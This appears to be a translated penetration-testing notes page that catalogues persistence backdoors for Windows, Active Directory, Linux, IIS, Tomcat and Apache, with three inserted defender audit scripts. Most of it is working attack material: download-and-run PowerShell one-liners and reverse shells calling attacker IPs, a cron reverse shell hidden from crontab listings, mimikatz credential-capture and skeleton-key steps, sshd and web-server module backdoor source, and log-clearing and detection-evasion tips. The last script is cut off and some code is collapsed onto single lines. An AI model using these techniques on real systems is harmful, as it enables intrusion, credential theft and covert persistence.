In the WMI-Persistence script change the payload address to wmi.xsl:
$finalPayload=" wmic os get /FORMAT:`"$Payload`""


>powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence    # removes the module
After a reboot the session returns.



Invoke-Tasksbackdoor

>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"


Invoke-ADSBackdoor

Creates a hidden file in an alternate data stream and a scheduled task that requests the payload once a minute.
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"

Generate the payload:
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_https
#run


Hiding a Webshell in an ADS

With a host file (index.php is a legitimate page):
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
<?php include('index.php:hidden.jpg')?>
<?php $a="696E6465782E7068703"."A68696464656E2E6A7067"; # hex encoding of "index.php:hidden.jpg"
$b="a"; include(PACK('H*',$$b))?>
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
Or without a host file:
>echo hide > :key.txt
>cd ../
>notepad test:key.txt

Upload bypass

Uploaded file name                 File actually created on the server
test.php:a.jpg                     test.php
test.php::$DATA                    test.php
test.php::$INDEX_ALLOCATION        a folder named test.php
test.php::$DATA\0.jpg              0.jpg

ADS & JavaScript

Create a text file test.txt with arbitrary content (this is the real file the user is meant to open). Write the program into a file stream (calc.exe here):
>type calc.exe > test.txt:calc.exe
Create a file link with mklink:
>mklink config.txt test.txt:calc.exe
Create readme.txt with arbitrary content and set it to hidden. Create readme.js with the following content:
var objShell = new ActiveXObject("shell.application");
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
objShell.ShellExecute("README.txt", "", "", "open", 1);
Running readme.js runs calc.exe and opens readme.txt.

Empire

LNK Backdoor

Empire> set Host http://192.168.1.150
Empire> set Port 8080
>launcher powershell <listener name>
Only the Base64 part of the generated launcher is used.
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript <Base64-encoded script>"


Removing the backdoor:
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"


WMI

Empire>powershell/persistence/elevated/wmi

SSP Injection for Passive Password Capture

Requires high privileges.

Mimikatz

Does not survive a reboot:
>privilege::debug
>misc::memssp
Lock the screen:
>rundll32.exe user32.dll,LockWorkStation


The credentials of accounts that log on are saved in
C:\Windows\System32\mimilsa.log

Survives a reboot:
Put mimilib.dll from the mimikatz package into the system32 directory.
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"    # inspect the current value
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ    # add mimilib

When an account logs on the password is saved to C:\Windows\System32\kiwissp.log; this also survives a reboot.


Empire

Copy mimilib.dll into the system32 folder:
>shell copy mimilib.dll C:\Windows\System32\
Use the module:
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll

PowerSploit

>Import-Module .\PowerSploit.psm1
>Install-SSP -Path .\mimilib.dll


Backdoor via Group Policy File Permissions

The domain's group policies and scripts are stored on the domain controller under C:\Windows\SYSVOL\sysvol\zone.com\Policies; domain machines poll this directory to update policy. On the domain controller give Everyone full control of Policies:
>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f

Use PowerView to find the policy file that applies to a domain machine:
PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath
Open C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf and append:
[Registry Values]
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe
[Version]
signature="$CHICAGO$"
Revision=1
Refresh policy manually:
>gpupdate /force
This hijacks taskhost.exe; c:\windows\system32\calc.exe can be replaced with a backdoor file or command.

Kerberoasting Backdoor

With setspn rights, add an SPN to a domain user:
>setspn -U -A RDP/zone.com godadmin

Any host in the domain can then obtain the TGS with Kerberoast:
https://github.com/malachitheninja/Invoke-Kerberoast

>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt

Or use rubeus.exe.

Crack:
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt

S4U2Self Backdoor

Run on the domain controller to find accounts that have an SPN and a password that never expires:
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}

Extract the user's hash with mimikatz's dcsync:
>lsadump::dcsync /domain:zone.com /user:y


Plant the backdoor:
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount <account>

Once planted, log on as account y to use it.
Trigger the backdoor:
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin

Inject the ticket and obtain the domain controller's CIFS and LDAP services:
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt


Constrained Delegation Backdoor

http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
Creates a new service account with constrained delegation, or adds the constrained-delegation backdoor to an existing service account whose password is known. Must run on a domain controller. This demonstration creates a new backdoor account; adding the capability to an existing service account with a known password uses the same steps.
PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com
The default password is Password@123!; it can be changed through the $Password parameter in the script.


https://github.com/samratashok/ADModule
Import Microsoft.ActiveDirectory.Management.dll and Import-ActiveDirectory.ps1 from ADModule:
>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
>Import-Module Import-ActiveDirectory.ps1
Now, logged on to the domain machine sub2k8 as the ordinary domain user y, request a TGT with kekeo:
Kekeo#tgt::ask /user:backdoor /domain:zone.com /password:Password@123!

Kekeo#tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com
Obtains a TGS for LDAP as the domain administrator.

Inject the TGS ticket with mimikatz:
mimikatz#kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi

Now dcsync can dump the krbtgt hash, from which a golden ticket can be forged:
mimikatz#lsadump::dcsync /user:krbtgt /domain:zone.com


Skeleton Key

Run with mimikatz on the domain controller:
>privilege::debug
>misc::skeleton


Any domain account can then log on to any host in the domain with the password mimikatz.
With the Empire module:
>usemodule persistence/misc/skeleton_key*
Bypassing LSA Protection:
>privilege::debug
>!+
>!processprotect /process:lsass.exe /remove
>misc::skeleton


Single-IP Access

>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
Only connections from the .107 machine get a shell; other machines cannot.



Linux cron Backdoor

>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
The carriage return followed by "no crontab for <user>" and 100 spaces makes crontab -l look empty on a terminal, while the real entry is still there.

#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

Recording SSH Passwords with strace

Install strace:
#apt-get install strace
#vi ~/.bashrc
Add:
alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'

SSHD Backdoor

>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
Opens port 31337; log in as root with any password:
>ssh root@192.168.1.1 -p 31337

Process Injection

http://cymothoa.sourceforge.net/
On the target:
>./cymothoa -p <PID> -s 1 -y <port>
On the attacker machine:
>nc -vv <ip> <port>


SSH Wrapper Backdoor

#cd /usr/sbin
#mv sshd ../bin
#echo '#!/usr/bin/perl' >sshd
#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
#chmod u+x sshd
#/etc/init.d/sshd restart
The regex /^..4A/ matches the packed peer address when the source port bytes are "4A", i.e. 0x3441 = 13377. On the attacker machine:
>socat STDIO TCP4:192.168.0.110:22,sourceport=13377

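A responder's check for this wrapper, added here as an example (not part of the post): it inspects whether sshd is still an ELF binary and decodes the source port a /^..XY/ sockaddr regex reacts to; the wrapper copy written to a temp file is constructed from the lines above.

```python
import os
import re
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
# A Perl regex literal of the form /^..XY/ applied to the packed sockaddr
SOCKADDR_REGEX = re.compile(r"/(\^\.\.[^/]{2})/")


def port_from_sockaddr_regex(pattern):
    """Turn a pattern such as '^..4A' (or '/^..4A/') matched against a packed
    sockaddr_in into the source port it selects: bytes 0-1 are the address family,
    bytes 2-3 the port in network byte order, so the two literals after '^..'
    are the big-endian port."""
    body = pattern.strip("/")
    if not body.startswith("^..") or len(body) < 5:
        raise ValueError("not a ^..XY sockaddr pattern: %r" % pattern)
    return struct.unpack("!H", body[3:5].encode("latin-1"))[0]


def inspect_sshd_bytes(head):
    """Findings for the first bytes of an sshd file; empty list means it looks like
    a normal ELF binary."""
    findings = []
    if head.startswith(ELF_MAGIC):
        return findings
    text = head.decode("latin-1", "replace")
    if head.startswith(b"#!"):
        findings.append("sshd is a script, not a binary: %s" % text.split("\n", 1)[0])
    else:
        findings.append("sshd does not start with the ELF magic")
    if "getpeername" in text:
        findings.append("wrapper inspects the peer address (getpeername) before exec")
    if '"/bin/sh"' in text or "'/bin/sh'" in text:
        findings.append("wrapper can exec /bin/sh on the connection socket")
    for m in SOCKADDR_REGEX.finditer(text):
        findings.append("trigger: source port %d" % port_from_sockaddr_regex(m.group(1)))
    return findings


def inspect_sshd(path):
    """Read the start of the file at path and run inspect_sshd_bytes on it."""
    with open(path, "rb") as fh:
        return inspect_sshd_bytes(fh.read(4096))


# Constructed copy of the wrapper from the recipe above, written to a temp file.
WRAPPER = (b"#!/usr/bin/perl\n"
           b'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);\n'
           b'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,\n')


def demo():
    fd, path = tempfile.mkstemp(prefix="sshd-wrapper-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(WRAPPER)
    try:
        return inspect_sshd(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for line in demo():
        print(line)
```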


SUID Shell

>cp /bin/bash /tmp/tmp
>chmod u+s /tmp/tmp
>/tmp/tmp -p


SSH Public/Private Key Login

>vim /etc/ssh/sshd_config
Uncomment the following:

>ssh-keygen
Copy /root/.ssh/id_rsa.pub to /root/.ssh/authorized_keys on the attacker side.
>ssh -i id_rsa target@1.1.1.1


Reptile

https://github.com/f0rb1dd3n/Reptile
Install:
>apt install build-essential libncurses-dev linux-headers-$(uname -r)
>git clone https://github.com/f0rb1dd3n/Reptile.git

Kbeast rootkit

http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
version - 0 : 2.6.18 (RHEL/CentOS 5.x)
          1 : 2.6.32 (Ubuntu 10.x) [default version]
Edit config.h: install path, log path, port, connection password, connection user.


./setup build
Connect from the attacker machine:
>telnet 192.168.1.1 13377


OpenSSH Backdoor

Download:
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
Back up the configuration files:
>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
Install the dependencies:
CentOS
>yum install -y openssl openssl-devel pam-devel zlib zlib-devel
Ubuntu
>apt-get install -y openssl libssl-dev libpam0g-dev
>tar zxvf openssh-5.9p1.tar.gz
>tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
>cd openssh-5.9p1
>patch <sshbd5.9p1.diff
>vim includes.h

/tmp/ilog records the passwords of users logging in to this machine
/tmp/olog records the credentials used from this machine to log in to other machines
The log file names can be prefixed with a dot to hide them
SECRETPW is the backdoor password
Check the current version:
>ssh -V

Edit version.h to match the current version.

Compile and install:
CentOS 7
>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
>make clean
>make && make install
>systemctl restart sshd.service
Ubuntu
>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
>make clean
>make && make install
Restart the service and restore the file timestamps:
>touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
>touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config



Clearing Traces
>export HISTFILE=/dev/null
>export HISTSIZE=0
>export HISTFILESIZE=0
>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history

IPTables Port Reuse

>iptables -t nat -N LETMEIN
>iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# open switch
>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# close switch
>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
On the attacker side:
# enable the reuse
>echo threathuntercoming | socat - tcp:192.168.0.110:80
# log in over port 80
ssh -p 80 root@192.168.0.110
# disable the reuse
echo threathunterleaving | socat - tcp:192.168.0.110:80


File Handling

>chattr +i shell.sh        # make the file immutable

>vim .shell.sh             # a dot-prefixed name is hidden from a plain ls

>attrib +s +h +r 1.txt     # Windows: system, hidden, read-only

>touch -r 1.file 2.file    # give 2.file the same timestamp as 1.file


IIS_Bin_Backdoor

From: https://github.com/WBGlIl/IIS_backdoor
Put IIS_backdoor_dll.dll into the web directory's bin folder and configure web.config:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <modules>
      <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
    </modules>
  </system.webServer>
</configuration>
IIS_backdoor_shell.exe runs the commands.

The name IISBackdoor is too obvious and easily recognised as a backdoor, so the backdoor is renamed here.


Rebuild the solution, put the DLL into bin and change web.config to:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <modules>
          <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
        </modules>
    </system.webServer>
</configuration>


Once added, the module is registered in IIS automatically.

Running a payload: generate a raw-format payload with msf, choose the shellcode option and drag in the raw file:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw


IIS_NETDLL_Spy

From: https://github.com/Ivan1ee/NetDLLSpy
The original author describes three methods. The first compiles the code into a DLL and instantiates the backdoor class from a new aspx file to run commands. The second registers an httphandler mapping for a chosen extension; the command output is saved to a file on the web server and read afterwards. The third uses jsc.exe to compile a JS script into a DLL, adds the mapping and connects with China Chopper (Caidao). The code here is a small modification of the original: the httphandler mapping runs the command and writes the result straight to the page, without saving it on the server first.
Code:
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;

namespace IsapiModules
{
    public class Handler : IHttpHandler
    {
        public bool IsReusable { get { return false; } }

        public void ProcessRequest(HttpContext context)
        {
            string input = context.Request.Form["InternetInformationService"]; // command
            if (context.Request.Form["microsoft"] == "iis") // do command
            {
                this.cmdShell(input);
            }
        }

        public void cmdShell(string input)
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.Arguments = "/c " + input;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            StreamReader output = process.StandardOutput;
            String result = output.ReadToEnd();
            output.Close();
            output.Dispose();
            HttpContext.Current.Response.Write(result);
        }
    }
}

Save it with any extension and compile with csc:
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs

Add to web.config:
<system.webServer>
  <handlers>
    <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
  </handlers>
</system.webServer>



Open IIS Manager: Handler Mappings now lists the new module.


Now request any file with the xxx extension.


Request it with parameters:
microsoft=iis&InternetInformationService=net user

The third method, connecting with China Chopper; the code is slightly modified here as well.
import System;
import System.Web;
import System.IO;

package IsapiModule
{
    public class Handler implements IHttpHandler
    {
        function IHttpHandler.ProcessRequest(context : HttpContext)
        {
            context.Response.Write("404 Not Found");
            var I = context;
            var Request = I.Request;
            var Response = I.Response;
            var Server = I.Server;
            eval(context.Request["Internet"]); // password parameter
        }
        function get IHttpHandler.IsReusable() : Boolean { return true; }
    }
}
Compile with jsc:
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js


Edit web.config and add the mapping; the extension here is .iis:
<system.webServer>
  <modules runAllManagedModulesForAllRequests="true"/>
  <directoryBrowse enabled="true"/>
  <staticContent>
    <mimeMap fileExtension=".json" mimeType="application/json" />
  </staticContent>
  <handlers>
    <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
  </handlers>
</system.webServer>
The mapping is added automatically. Now request any file with the iis extension.

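One way to audit a web.config for the module and handler entries shown in this section and in IIS_Bin_Backdoor above (added example, not the tools' own code): it flags managed types outside an allow-list, unusual handler extensions and enabled directory browsing; the allow-lists, the built-in name set and the sample configs are assumptions constructed for the demo.

```python
import xml.etree.ElementTree as ET

# Managed types an ordinary ASP.NET site registers (assumption for the demo; use the
# site's own inventory in practice). Anything else resolves to an assembly in /bin.
KNOWN_TYPE_PREFIXES = ("System.Web.", "Microsoft.", "System.ServiceModel.")
# Extensions IIS normally maps to managed handlers.
KNOWN_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".svc", ".axd", ".cshtml", ".vbhtml"}
# Built-in IIS entry names that the examples above reuse for custom code.
BUILTIN_NAMES = {"PageHandlerFactory-ISAPI-2.0-32", "PageHandlerFactory-Integrated",
                 "UrlRoutingModule", "ScriptModule", "Session"}


def _type_name(type_attr):
    """'Ns.Class, Assembly, Version=...' -> ('Ns.Class', 'Assembly'); no comma means
    the runtime probes every assembly in /bin for the class."""
    parts = [p.strip() for p in type_attr.split(",")]
    return parts[0], (parts[1] if len(parts) > 1 else "<any assembly in /bin>")


def audit_web_config(xml_text):
    """Return a list of finding strings for one web.config (or a bare <system.webServer>
    fragment). An empty list means nothing outside the allow-lists was registered."""
    findings = []
    root = ET.fromstring(xml_text)
    server = root if root.tag == "system.webServer" else root.find("system.webServer")
    if server is None:
        return findings
    browse = server.find("directoryBrowse")
    if browse is not None and browse.get("enabled", "").lower() == "true":
        findings.append("directoryBrowse enabled")
    for kind in ("modules", "handlers"):
        section = server.find(kind)
        if section is None:
            continue
        for add in section.findall("add"):
            name, typ = add.get("name", "?"), add.get("type", "")
            notes = []
            if typ and not typ.startswith(KNOWN_TYPE_PREFIXES):
                cls, asm = _type_name(typ)
                notes.append("custom type %s from %s" % (cls, asm))
                if name in BUILTIN_NAMES or name.startswith("PageHandlerFactory"):
                    notes.append("reuses built-in name")
            path = add.get("path", "")
            if kind == "handlers" and path:
                ext = path[path.rfind("."):].lower() if "." in path else path
                if ext not in KNOWN_EXTENSIONS:
                    notes.append("maps unusual path %s" % path)
            if notes and add.get("verb") == "*":
                notes.append("all verbs")
            if notes:
                findings.append("%s '%s': %s" % (kind[:-1], name, "; ".join(notes)))
    return findings


# Constructed samples copied from the two sections above.
MODULE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <modules>
      <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
    </modules>
  </system.webServer>
</configuration>"""

HANDLER_CONFIG = """<system.webServer>
  <modules runAllManagedModulesForAllRequests="true"/>
  <directoryBrowse enabled="true"/>
  <handlers>
    <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*"
         type="IsapiModule.Handler" preCondition="integratedMode"/>
  </handlers>
</system.webServer>"""

BENIGN_CONFIG = """<configuration><system.webServer><handlers>
  <add name="PageHandlerFactory-Integrated" path="*.aspx" verb="GET,HEAD,POST,DEBUG"
       type="System.Web.UI.PageHandlerFactory" preCondition="integratedMode"/>
</handlers></system.webServer></configuration>"""

if __name__ == "__main__":
    for cfg in (MODULE_CONFIG, HANDLER_CONFIG, BENIGN_CONFIG):
        print(audit_web_config(cfg))
```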


可使用菜刀直接连接


IIS_RAID

From: https://github.com/0x09AL/IIS-Raid
Build with VS2019. In Functions.h change the connection password; passfile is where the dumped credentials are saved and com_header is the request header used for communication between the backdoor and the server.

Open the project, change the password and press Ctrl+B to build the solution (a Release build here).
Upload the DLL to the server, rename it and install it as a module:
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true

The module now shows up in the module list.

Remote connection:
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
Commands are run with:
>cmd <command>


The dump command dumps the login information of the IIS site and saves it at the configured location.
inject runs shellcode.
Generate raw-format shellcode with CS/msf:
>inject <path>


Java Web Backdoor

From: https://www.freebuf.com/articles/web/172753.html
https://github.com/rebeyond/memShell
Once a webshell or bash shell is obtained, download the backdoor and inject it into the process to get a fileless backdoor that revives itself. Download and unpack it into any web directory.

This yields two jar files.
Run it, with password set to your own password:
>java -jar inject.jar password

After injection, commands can be run from any page and any URL of the web application:
http://192.168.0.121:8080/css/app.css?pass_the_world=password

Supports running commands, reverse shells, upload/download, listing directories, reading files, adding a proxy and connecting with China Chopper.


Tomcat JSP HideShell

From: https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA
https://github.com/QAX-A-Team/HideShell
Upload your own shell together with hideshell to the target. Request your shell first so that Tomcat compiles it and stores a JspServletWrapper for it in the JspRuntimeContext.

Then open hideshell.jsp and click hide for your shell.

It is now hidden.


Opening hideshell.jsp again shows the file name of the hidden shell.

Request it to check.


hideshell can hide itself as well; it is then reached as hidden-hideshell.jsp.

The directory is then empty.

Requests to a shell hidden this way generate no log entries.

Does the access survive deleting the shelltest folder?

It does.


Apache Module后门1

From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor生成模板结构>apxs -g -n auth


编辑mod_auth.c文件
#include "httpd.h"#include "http_config.h"#include "http_protocol.h"#include "ap_config.h"#include <stdio.h>#include <stdlib.h>static int auth_handler(request_rec *r){    const apr_array_header_t    *fields;    int                            i;    apr_table_entry_t           *e = 0;    char FLAG = 0;    fields = apr_table_elts(r->headers_in);    e = (apr_table_entry_t *) fields->elts;    for(i = 0; i < fields->nelts; i++) {        if(strcmp(e[i].key, "Authorizations") == 0){            FLAG = 1;            break;        }    }    if (FLAG){        char * command = e[i].val;        FILE* fp = popen(command,"r");        char buffer[0x100] = {0};        int counter = 1;        while(counter){            counter = fread(buffer, 1, sizeof(buffer), fp);            ap_rwrite(buffer, counter, r);        }        pclose(fp);        return DONE;    }    return DECLINED;}static void auth_register_hooks(apr_pool_t *p){    ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);}module AP_MODULE_DECLARE_DATA auth_module = {    STANDARD20_MODULE_STUFF,     NULL,                  /* create per-dir    config structures */    NULL,                  /* merge  per-dir    config structures */    NULL,                  /* create per-server config structures */    NULL,                  /* merge  per-server config structures */    NULL,                  /* table of config file commands       */    auth_register_hooks  /* register hooks                      */};编译后重启apache>apxs -i -a -c mod_auth.c && service apache2 restart


原文件接受的头是backdoor太明显,这里换成了Authorizations

或使用python来执行

#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport sysdef exploit(host, port, command):    headers = {        "Authorizations": command    }    url = "http://%s:%d/" % (host, port)    response = requests.get(url, headers=headers)    content = response.content    print contentdef main():    if len(sys.argv) != 3:        print "Usage : "        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])        exit(1)    host = sys.argv[1]    port = int(sys.argv[2])    while True:        command = raw_input("$ ")        if command == "exit":            break        exploit(host, port, command)if __name__ == "__main__":    main()Apache Module后门2From:https://github.com/VladRico/apache2_BackdoorMod.load文件传入/etc/apache2/mods-available/目录,.so文件传入/usr/lib/apache2/modules/目录启动后门模块,重启apache>a2enmod backdoor&service apache2 restart

Add the field password=backdoor to the Cookie header.
Requesting http://ip/ping should return the response shown below, which means the backdoor is running.

Requesting http://ip/bind/12345 opens a bind shell; on the attacking machine run nc ip 12345.

Requesting http://ip/revtty/192.168.0.107/12138 opens a reverse connection; on the attacking machine (the .109 host) run nc listening on 12138.

Requesting http://ip/proxy/1337 starts a SOCKS proxy.

To stop the SOCKS proxy, run
>echo "imdonewithyou" | nc 192.168.0.111 1337

and the proxy shuts down.
The original author's file naming ("backdoor") is too obvious; rename the files and recompile.
Create the module skeleton under the name phpmodev


Change the cookie to a decoy field, Authorizations=PHPSESSIONID


Apache Module backdoor 3

From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
Generate the module skeleton:
>apxs -g -n phpdevmod


Edit the generated mod_phpdevmod.c.
Compile:
>make -e CC=x86_64-linux-gnu-g++

The resulting .so ends up in the .libs/ directory.

Copy it to /usr/lib/apache2/modules/.
Edit /etc/apache2/mods-enabled/php7.0.load and append the following (Apache does not accept a comment on the same line as a directive, so the note sits on its own line):
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
# the path can be any file that does not exist
<Location /qq.jpg>
    SetHandler phpdevmod
</Location>


Apache must be restarted afterwards.
The backdoor is reached as http://ip/qq.jpg?<hex-encoded command>
Request the backdoor file directly:

636174202F6574632F706173737764 is `cat /etc/passwd` encoded as hex (each byte as two hex digits; it is plain hex, not %-escaped URL encoding).
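Seen from the defender's side, all three module backdoors above share two traits: a LoadModule directive that the package manager never wrote, and a .so that no package owns (or a packaged .so whose contents changed). The script below is an added example, not code from the article or from either linked project: it walks the .load/.conf files a Debian-style Apache reads from mods-enabled/, extracts every LoadModule directive (including one smuggled into an unrelated file such as php7.0.load), and checks each module against the md5sums manifests dpkg keeps under /var/lib/dpkg/info/. The directory layout, module blobs and manifest are constructed in a temporary directory so it runs offline; `audit`, `build_demo` and the package name apache2-bin.md5sums are the example's own choices.

```python
#!/usr/bin/env python3
"""Audit Apache LoadModule directives against dpkg's md5sums manifests."""
import hashlib
import os
import re
import tempfile

# Apache directives are case-insensitive; the path may be quoted.
LOADMODULE_RE = re.compile(r'^\s*LoadModule\s+(\S+)\s+"?([^"\s]+)"?', re.IGNORECASE | re.MULTILINE)


def parse_load_modules(config_text):
    """Every LoadModule in a config fragment, as (module_name, so_path)."""
    return [(m.group(1), m.group(2)) for m in LOADMODULE_RE.finditer(config_text)]


def load_dpkg_manifest(info_dir):
    """Map '/abs/path' -> md5 from every *.md5sums file (line format: '<md5>  <relative path>')."""
    manifest = {}
    for name in os.listdir(info_dir):
        if not name.endswith('.md5sums'):
            continue
        with open(os.path.join(info_dir, name)) as fh:
            for line in fh:
                digest, _, rel = line.rstrip('\n').partition('  ')
                if rel:
                    manifest['/' + rel] = digest
    return manifest


def md5_of(path):
    with open(path, 'rb') as fh:
        return hashlib.md5(fh.read()).hexdigest()


def audit(mods_enabled_dir, manifest, root='/'):
    """Return (finding, subject, detail) tuples for everything that needs a human look."""
    findings = []
    for fname in sorted(os.listdir(mods_enabled_dir)):
        if not fname.endswith(('.load', '.conf')):
            continue
        with open(os.path.join(mods_enabled_dir, fname)) as fh:
            directives = parse_load_modules(fh.read())
        # A .load file normally carries exactly one LoadModule, for the module it is named
        # after; a second one (the php7.0.load trick above) is suspicious on its own.
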